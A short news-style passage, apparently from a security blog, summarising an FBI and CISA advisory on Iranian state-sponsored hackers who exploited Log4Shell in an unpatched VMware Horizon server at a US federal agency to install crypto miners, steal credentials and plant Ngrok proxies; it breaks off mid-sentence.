Iranian APT Uses Log4j Vulnerability
To Hack US Federal Network

Contents

Summary Of The Attack

  • In December of last year, US federal agencies were the subject of hacking assaults, and companies were harmed.
  • The Department of the Treasury, the Department of Commerce, and the US Department of Homeland Security were all affected.
  • This time, according to the FBI and CISA, Iranian government-sponsored hackers accessed an undisclosed US federal agency’s network early this year, using the Log4Shell vulnerability to deploy crypto miners and compromised credentials.
  • Cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, advanced to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence,” according to the advisory.
  • The assault highlights the pervasiveness of the Log4j vulnerability, which made worldwide headlines a year ago and remains a live danger for many businesses.
.

What Happened?

According to the FBI and CISA, Iranian government-sponsored hackers accessed an undisclosed US federal agency’s network early this year, using the